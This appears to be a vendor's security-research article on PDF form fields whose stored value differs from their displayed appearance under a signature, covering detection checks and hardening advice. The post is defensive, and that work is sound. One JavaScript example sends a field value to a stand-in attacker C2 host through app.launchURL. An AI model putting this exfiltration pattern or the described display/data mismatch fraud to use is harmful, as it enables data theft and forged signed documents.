PQ PDF Logo
PQ PDF Tools Secure document utilities for everyday workflows.
Home About Enterprise Contact Feedback Legal Privacy Security Status Development Analytics

Security Research — Published 24 May 2026

PDF Forms as Executable
Security Boundaries

A PDF form field has two independent representations of its value: /V, the machine-readable data value that JavaScript reads and form submission posts, and /AP, the appearance stream that the viewer renders as pixels on screen. They are not derived from each other. A digital signature can certify both while they disagree. This is the V/AP problem — and it is structurally provable from the raw byte stream, without rendering.

Structural indicators documented in this article
  • /NeedAppearances true — when paired with a digital signature, the certified content and displayed content are guaranteed to differ
  • Checkbox and radio /V vs /AS divergence — the most deterministic V/AP check: a pure dictionary key comparison
  • AP stream text extraction for text, listbox, and combobox fields — with /Opt export-value resolution and hex-string /V decoding
  • Field-value seeding in JavaScript behavioral analysis — why empty getField() returns cause conditional exploitation chains to be missed
  • DocMDP P=1 and DSS/LTV — the boundary ISO 32000-2 §12.8.2.2 draws between permitted and impermissible incremental updates

Background: Two Data Paths, One Signature

Marc Kaufman retired from Adobe having worked on every version of Acrobat from 2 through 12. He submitted a feedback report through our contact form pointing at a linearization gap in our scanner — our incremental-update detection used a set difference to find injected objects, which silently passed redefined objects carrying the same ID. We fixed it. He then pointed at MDP. We fixed that. He then asked how deep into the V/AP woods we wanted to go.

The answer to that question is the subject of this article.

Every AcroForm field has two independent data stores:

KeyWhat it containsWho reads it
/V The machine-readable field value JavaScript (doc.getField().value), form submission (SubmitForm), digital signature byte-range hash
/AP /N A self-contained PDF content stream that the viewer renders as pixels The viewer, the user — nothing else

These two stores are not derived from each other. A PDF author can set /V to (I agree to transfer $1,000) and author an /AP stream that renders I agree to transfer $10. The user signs what they see. The signature covers both. The signed content and the displayed content are structurally different by construction, inside the certified byte range.

Known Exploitation Patterns

The V/AP gap has been documented in both academic research and operational fraud. In 2021, researchers at Ruhr University Bochum published “Shadow Attacks: Hiding and Replacing Content in Signed PDFs,” demonstrating that content can be concealed inside a signed byte range — invisible to signature validators, visible to the rendering viewer. The disclosure reached 28 PDF viewer vendors and produced patches in Adobe Acrobat, Foxit, and others. The attack class directly exploits the V/AP separation described here: placing different content in the display layer than in the data layer, both within the certified range.

In operational settings, the same mechanism appears in a simpler form. Signed invoice PDFs where an automated payment system reads /V while the human signer saw what /AP rendered are a documented pattern in business email compromise campaigns. A field that displays “$1,200.00” to the signer while /V holds “$12,000.00” survives signature validation intact.

Several concrete vulnerability patterns exploit the AcroForm field model and are detected by this scanner:

CVEPatternMechanism
CVE-2021-28550 AcroForm + getField / setFocus JavaScript Use-after-free in Acrobat’s form field manipulation path, triggered by specific getField() and setFocus() call sequences in AcroForm JavaScript
CVE-2021-21017 XFA + JavaScript + instanceManager Heap buffer overflow via XFA form handling; exploited in the wild before patching. XFA is deprecated in PDF 2.0 but still rendered by Acrobat
CVE-2024-45112 XFA/AcroForm mixed field access Type confusion triggered when a document mixes XFA and AcroForm field access in the same session — a pattern not present in legitimately authored forms
CVE-2023-21608 Annotation + event.target JavaScript Use-after-free in the annotation engine triggered via event.target references in AcroForm field event handlers (CVSS 7.8)

XFA-based forms more broadly have been observed in malware campaigns abusing FormCalc and JavaScript execution triggered at document open — a delivery mechanism less visible to scanners that focus on AcroForm JavaScript paths and do not inspect XFA-embedded scripting separately.

Five Structural Indicators: V/AP Divergence Without Rendering

The fundamental constraint for deterministic V/AP analysis is avoiding the renderer. Rasterising a field region and running OCR introduces renderer-specific differences, font fallback differences, DPI-dependent text segmentation, OCR nondeterminism, and false-positive rates that are incompatible with forensic guarantees. Every indicator below derives from the raw PDF object model, reproducibly, without opening the file in a viewer.

/NeedAppearances True

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer is instructed to regenerate /AP from /V at open time. The /AP streams stored on disk are stale by construction — they may not reflect /V. On its own this is medium severity: stale AP is common in programmatic form-fill workflows (mail merge, DocuSign) that update /V but skip AP regeneration before saving.

Combined with a digital signature it is critical. The byte-range hash covers the stale /AP. The viewer regenerates the appearance after opening. The signed content and the displayed content are guaranteed to differ — you cannot construct a signed document where /NeedAppearances true and the certified bytes equal what the viewer renders.

Checkbox and Radio: /V vs /AS Key Comparison

For checkbox and radio button fields, /AS (Appearance State) selects which entry in /AP /N the viewer renders. /V is the stored data value. Both are name objects in the widget annotation dictionary. We extract both via regex against the xref object and compare them as strings — no rendering, no approximation.

If /V is /Yes and /AS is /Off, the displayed state and the stored value structurally disagree. That fact is in the file regardless of any viewer. This is the most deterministic V/AP check possible: a pure dictionary key comparison.

In a signed document both /V and /AS fall within the signed byte range. The mismatch is by construction inside certified content.

AP Stream Text Extraction: Text, Listbox, Combobox

For text fields, listboxes, and comboboxes, the /AP /N stream is a PDF content stream containing text drawing operators. We decompress it via PyMuPDF, extract Tj, TJ, and ' operators, reconstruct the display string, PDF-unescape it, whitespace-normalise it, and compare it to /V.

Three encoding cases are handled:

  • Literal string /V — /V (Hello) — extracted directly
  • Hex-string /V — /V <48656c6c6f> — decoded via bytes.fromhex(); UTF-16BE (BOM FEFF) detected and decoded correctly
  • Listbox multi-select array — /V [(opt1) (opt2)] or [<hex1> <hex2>] — elements joined for comparison

For listbox and combobox fields, /Opt can store display/export pairs: [[(United States) (us)] [(United Kingdom) (uk)]]. The /V holds the export value (us); the /AP renders the display label (United States). Without resolving this map, every legitimately authored dropdown using export-value pairs would fire a false positive. We build an export→display map from /Opt and substitute the display label as the comparison target before checking.

When the /AP stream exists but contains no text drawing operators at all, we flag it separately: the value is present in the file and covered by any signature, but the field renders blank to the viewer.

Value Set, No AP Defined

When /V is non-empty but no /AP stream exists, the viewer falls back to the field’s /DA (Default Appearance) and constructs a rendering itself. The displayed content is viewer-defined — it is not statically present in the file. Different viewers may render different things. Medium severity.

Correlation Engine Compound Patterns

Four compound indicators in the weighted correlation engine (Engine 44) fire on combinations:

CombinationSeverityWhy
/NeedAppearances + digital signature Critical Signed bytes guarantee to cover a different appearance than what the viewer displays
V/AS mismatch + digital signature Critical Displayed state and certified value structurally differ within the same signed byte range
/NeedAppearances + JS or SubmitForm High Stale AP paired with active form content — the displayed values may differ from what is executed or exfiltrated
/NeedAppearances + DocMDP constraint violation Critical Uncertified modification rendered visible via viewer-regenerated appearance

Normal Interactive PDFs vs. Suspicious Patterns

AcroForms, JavaScript, and automatic actions are standard PDF features used legitimately in millions of documents every day. A sign-and-submit button uses JavaScript. A government tax form uses an AcroForm with /SubmitForm. An e-signature platform uses DocMDP to certify the signed content. A mail-merge system may legitimately produce documents with /NeedAppearances true because it updates /V programmatically without regenerating /AP. None of that is inherently suspicious.

The checks in this article target a specific subset of structural conditions that are rarely present in legitimately authored documents and frequently present in documents where the display and data layers have been deliberately decoupled:

FeatureNormal useSuspicious pattern
AcroForm + JavaScript Field validation, conditional field visibility, submit-to-URL on a known endpoint Field value read and posted to an external URL not visible in the document; conditional branch taken only when a specific field equals a pre-seeded value
/NeedAppearances true Programmatic form fill where AP regeneration is deferred (DocuSign, mail merge) /NeedAppearances true combined with a digital signature — the certified bytes are guaranteed to cover a different appearance than what the viewer shows
/V vs /AS on a checkbox Should always match in a well-formed document Structural mismatch: /V /Yes but /AS /Off — the stored value and displayed state disagree by construction
AP stream text vs /V Should agree after /Opt export-value resolution AP renders “Approved” while /V holds “Rejected”; or AP stream is blank while /V is non-empty
DocMDP P=1 + incremental update DSS/LTV additions permitted under ISO 32000-2 §12.8.2.2 Incremental update containing form modifications, annotations, JavaScript, or OpenAction after a P=1 certifying signature

A scanner finding a V/AP mismatch is not saying “this form is dangerous.” It is saying the file contains a structural condition that is worth examining: the value in the file and the value the viewer renders do not agree, and that disagreement is inside the certified byte range. Whether the cause is a buggy form authoring tool, a careless programmatic fill, or a deliberate manipulation is a question the indicator raises — not one it answers.

JavaScript Field-Value Conditioning: A Behavioral Analysis Gap

JavaScript behavioral emulation executes extracted PDF JavaScript in a sandboxed Node.js vm context with a stub of the Acrobat API. The gap documented here is not specific to any one implementation — it applies to any behavioral sandbox that does not seed doc.getField() with real /V values from the file. Previously, a stub returning { value: '' } for every field was a common default.

The practical consequence: when malicious JavaScript reads a field value and acts on it — submitting it to a URL, using it in a conditional branch, passing it to app.launchURL() — the emulator captured the event with an empty string rather than the actual content. Exploitation chains conditioned on field values were not followed correctly:

// Attacker JS inside the PDF
if (doc.getField('status').value == 'approved') {
    app.launchURL('https://attacker.example/c2?v=' + doc.getField('amount').value);
}

With value: '', the condition '' == 'approved' is false — the branch is never taken, the LAUNCH_URL event is never emitted, and the emulator reports clean.

The correct approach: the AcroForm field enumeration pass collects a field_values map (field name → /V string) during widget traversal. The behavioral emulator reads this map and prepends const _pq_fv = {...}; to the stub before execution. doc.getField(name) returns the real value from the file; doc.numFields reflects the true field count. SUBMIT_FORM and LAUNCH_URL events carry the actual field content. Signature fields are excluded — their /V is a PKCS#7 blob, not a meaningful string.

DocMDP P=1 and DSS/LTV: What ISO 32000-2 Actually Permits

DocMDP P=1 means the certifying signature permits no modifications to the document whatsoever — not form fill-ins, not annotations, nothing. A nave implementation flags any incremental object after a P=1 signature as a bypass attempt. The problem is that ISO 32000-2 explicitly carves out an exception that such an implementation will violate on a large class of legitimately authored documents.

Marc Kaufman pointed out the gap: ISO 32000-2 §12.8.2.2 NOTE 2 explicitly permits DSS (Document Security Store) and LTV (Long Term Validation) additions in an incremental update even under P=1.

DSS carries the material required to validate a digital signature long after the signing certificate’s OCSP responder or CRL distribution point may no longer be online: OCSP responses, certificate revocation lists, and the full certificate chain. Adding this material post-signing is a standard PAdES workflow — it does not modify the certified document content in any MDP sense. Every legitimately LTV-enabled P=1 document was being flagged critical.

The fix detects DSS-only incremental updates: the section contains /DSS or /VRI and has no execution vectors (no JavaScript, no /OpenAction), no annotations, no form elements, and no /AA additional actions. When P=1 and the incremental section is DSS-only, the scanner emits a low-severity informational note citing the spec section rather than a bypass finding. If DSS is mixed with any document modification or execution vector, the full bypass indicator fires as before.

Note on scope

File MDP (FieldMDP, /TransformMethod /FieldMDP) is a distinct transform from DocMDP. Where DocMDP applies a permission level to the entire document, FieldMDP applies per-approval-signature constraints to named form fields — specifying which fields are locked and which are not. Both are detected separately. The DSS/LTV exemption applies to DocMDP P=1 only; FieldMDP constraint validation is unchanged.

Structural Limits: What Rasterisation Cannot Provide

The question Marc Kaufman asked — “how far into the woods do you want to go?” — has a principled answer. Rasterising a field region and running Tesseract against it is technically possible. For deterministic, reproducible forensic analysis that must produce consistent results on the same file across runs, it is the wrong approach for reasons that are architectural, not merely practical.

The problems with rasterisation in this context:

  • Renderer-specific differences — MuPDF and Ghostscript render the same field differently
  • Font fallback differences — missing fonts produce different glyphs on different systems
  • DPI-dependent text segmentation — results change with render resolution
  • OCR nondeterminism — the same raster produces different strings across runs
  • Language-model bias — OCR engines correct toward plausible words, hiding injected content
  • False-positive rates that break the guarantees a forensics engine must provide
  • Unpredictable latency spikes on large form documents

Everything where V/AP divergence is provable from the raw byte stream — the cases where the file and the display disagree by construction — is covered by the five checks above. The one case that is not covered is a custom font with a remapped encoding where the glyph for code point 0x41 renders as “B” rather than “A” — detecting that requires either running a renderer or parsing the font’s encoding tables and comparing them against the AP stream’s character codes. That is a separate engine, not a V/AP check.

An Open Question: DocMDP P=2 and Incremental Form Fill-ins

DocMDP P=2 permits form fill-ins and digital signatures but prohibits any other modification. The interaction between P=2 and incremental form fill-ins is the one area Marc flagged as worth thinking about further. The specific edge case: a viewer that fills a form field incrementally under P=2, updating /V in the incremental section, is permitted. A viewer that also regenerates the /AP stream in the same incremental section may or may not be considered a permitted modification depending on whether the validator treats AP regeneration as a document change.

The practical consequence: a certified P=2 document could have been legitimately filled, producing an incremental /AP update that some validators accept and others reject. Our scanner currently flags all incremental object additions under P=2 that contain form elements as potential violations. Whether a specific update is legitimate depends on whether it was generated by a compliant form-fill operation or by an attacker modifying fields outside the permitted scope. We are tracking this as a known nuance, not a confirmed false positive.

Safe Handling and Configuration

The technical findings above have practical consequences for anyone who receives, processes, or routes PDF forms. These are not theoretical edge cases — they apply to signed contracts, regulatory filings, and any workflow where a PDF form value is treated as authoritative.

For Individuals: Viewer Settings

  • Disable JavaScript in Acrobat: Edit → Preferences → JavaScript → uncheck “Enable Acrobat JavaScript.” Most form functionality works without it. JS is only required for complex field validation and multi-step wizards.
  • Use Protected Mode / Protected View: Acrobat Reader’s Protected Mode (Windows, enabled by default since Reader X) sandboxes the renderer in a low-privilege process. Confirm it is active under Edit → Preferences → Security (Enhanced). Disable “trust files in my Documents folder” if you receive external forms.
  • Open in a browser for untrusted files: Chrome and Firefox open PDFs in pdf.js or the built-in renderer without executing Acrobat JavaScript. This does not prevent V/AP divergence from affecting the display, but it eliminates the JavaScript execution surface entirely.
  • Verify fields independently: For any signed document where field values are legally or financially significant, confirm the visible value matches the form data by checking document properties or exporting form data as FDF/XFDF and comparing to what you see.

For Developers and Pipelines

  • Never trust /AP for authoritative field values. If you are processing form submissions from a PDF, read /V from the AcroForm dictionary — not text extracted from the appearance stream. Use a library that exposes the AcroForm object model (PyMuPDF, pdfminer, iText) rather than one that renders and OCRs.
  • Sanitize before storing: Strip /AP streams and rebuild them from /V when your pipeline is the authoritative writer. This eliminates divergence introduced by upstream tools. qpdf --generate-appearances regenerates appearance streams from field values.
  • Reject /NeedAppearances true in signed documents: If your pipeline accepts signed PDFs and treats them as authoritative, a file with /NeedAppearances true and a digital signature should be rejected or flagged for manual review — the signed content and the displayed content structurally cannot match.
  • Run forms through a static scanner before ingestion: If your system auto-processes form submissions (extract field values, trigger payment, update a record), scan the PDF before extraction. The field-value conditioning pattern — JavaScript that reads /V and posts it conditionally — is detectable statically and is rarely present in legitimately authored forms.

For Enterprise and IT

  • Group Policy (Windows): Adobe provides ADMX templates for Acrobat and Reader. Key settings include bEnableJS (disable JavaScript), bEnhancedSecurityInBrowser, and bEnhancedSecurityStandalone. These are available via the Adobe Enterprise Toolkit.
  • Email gateway configuration: Most email security gateways support PDF content inspection but vary in how deeply they inspect AcroForm structure. Where possible, configure your gateway to flag PDFs with JavaScript, OpenAction, and SubmitForm for manual review rather than auto-delivering them. /NeedAppearances true in combination with a signature is a narrower, more reliable signal.
  • Document verification workflows: For high-value signed documents (contracts, financial forms), consider a two-step verification: signature validation confirming the byte range is intact, followed by a structural audit confirming no V/AP divergence indicators. These are independent checks and both are necessary.
  • XFA: XFA forms are deprecated in PDF 2.0 and are not supported by many modern viewers, but Acrobat still renders them. If your environment has no business need to receive XFA forms, blocking them at the gateway eliminates a scripting attack surface that is distinct from AcroForm JavaScript and not always covered by the same scanner rules.

Detection Methodology Reference

The following table summarises the V/AP structural checks documented in this article. All operate on the raw PDF object model and do not require rendering. Severity escalates when indicators combine — the compound patterns in the weighted correlation analysis are documented in the “Correlation Engine Compound Patterns” table above.

Structural checkWhat it findsSeverity conditions
/NeedAppearances true AP streams are stale by construction — viewer regenerates from /V at open time Medium alone; Critical when a digital signature is also present
Checkbox/radio /V vs /AS key comparison Stored data value and displayed appearance state structurally disagree High; Critical when inside a signed byte range
AP stream text extraction (text fields) Tj/TJ operators reconstructed and compared to /V; literal and hex-string encoding handled High; Critical when signed
AP stream text extraction (listbox/combobox) Multi-select array extraction; /Opt export→display map resolved before comparison to prevent false positives on choice fields High; Critical when signed
Blank AP stream AP stream present but contains no text drawing operators — value in file, field renders blank Medium
Missing AP (/V set, no /AP) Display is viewer-defined via /DA — not statically present in the file Medium
Field-value seeding in JS behavioral analysis doc.getField() stub receives real /V values; conditional exploitation chains that gate on field content are correctly followed Applies to any JS indicator elevated by field-value conditioning
DocMDP P=1 + DSS-only incremental update Incremental section contains /DSS//VRI and no execution vectors, annotations, or form elements — permitted under ISO 32000-2 §12.8.2.2 Low (informational); Full bypass severity if DSS is mixed with execution vectors

Marc Kaufman’s observation — that PDF/Acrobat is “a Roach Motel: features go in but never come out” — applies equally to the complexity that accumulates around those features over three decades. The checks above are designed to avoid false positives on legitimately authored documents; the /Opt export-value resolution and hex-string /V handling were added specifically to handle valid authoring patterns that naive string comparison would misread. Edge cases are possible; the structural indicators raise questions, not verdicts.

Run the scanner against a PDF →


PQ PDF PQ PDF Tools

© 2026 PQ PDF — All rights reserved.

← All PDF Tools • About • Legal • Privacy • Security • Contact

Secure document utilities — free, private, zero-retention. pqpdf.com